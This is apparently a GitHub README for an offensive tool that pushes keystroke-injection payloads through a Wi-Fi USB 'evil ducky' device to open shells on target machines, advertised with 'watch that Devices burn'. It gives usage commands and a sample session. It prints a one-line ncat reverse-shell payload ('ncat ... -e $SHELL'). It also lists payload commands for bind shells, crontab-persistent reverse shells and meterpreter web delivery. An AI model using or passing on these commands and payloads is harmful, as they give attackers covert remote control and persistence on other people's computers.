/CoreNeoExec

Release Neo, the Evil Ducky scripts into any Hardware or drive and watch that Devices burn.

Primary LanguageCGNU Lesser General Public License v3.0LGPL-3.0

Warning : Newest version of Neo Toolkit expect the Neo to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the --force arguments. For more customization informations go to swisskyrepo.github.io .

Where to buy a Neo injector ? I got mine from Aliexpress

How to use the script

python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads / windows.txt -h                 
usage: injector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
                       [--user [USER]] [--pass [PASS]] [--panel [PANEL]]
                       [--payload [PAYLOAD]]

optional arguments:
  -h, --help           show this help message and exit
  -v                   Verbosity of the output
  --host [HOST]        Host reverse-shell
  --port [PORT]        Port reverse-shell
  --user [USER]        Wifi Panel username
  --pass [PASS]        Wifi Panel password
  --panel [PANEL]      Wifi Panel password
  --payload [PAYLOAD]  Payload template

Targeting a Windows OS

python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt

Send a simple reverse-shell payload

$ python3 injector.py -v --host 127.0.0.1 --port 4444
     -------------------------------------------------------------
      Neo injector - You need to be connected to the Exploit AP
     -------------------------------------------------------------
                   __   °
                 <(o )___
                  ( ._> /
                   `---'                      @pxcs

Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
-------------------------------------------------------------------
>>> reverse
Payload:
Rem:Default Payload
Press:130+195
CustomDelay:1000
Print: bash SHELL:14
CustomDelay:1000
Press:176

Sending payload to http://192.168.1.1/runlivepayload

Payloads and commands

Commands Description
bind initiate a bind shell on results.port
reverse initiate a reverse shell on results.host and results.port
crontab set up a crontab reverse shell on results.host and results.port
meterpreter use exploit script / web delivery with a posh-payload
send some text send the specified text
h help
q quit

You can change the options with SET option_name option_value

>>> set host 127.0.0.1
>>> set port 4444

Thanks to:

  • swisskyrepo
  • metasploit
  • pxcs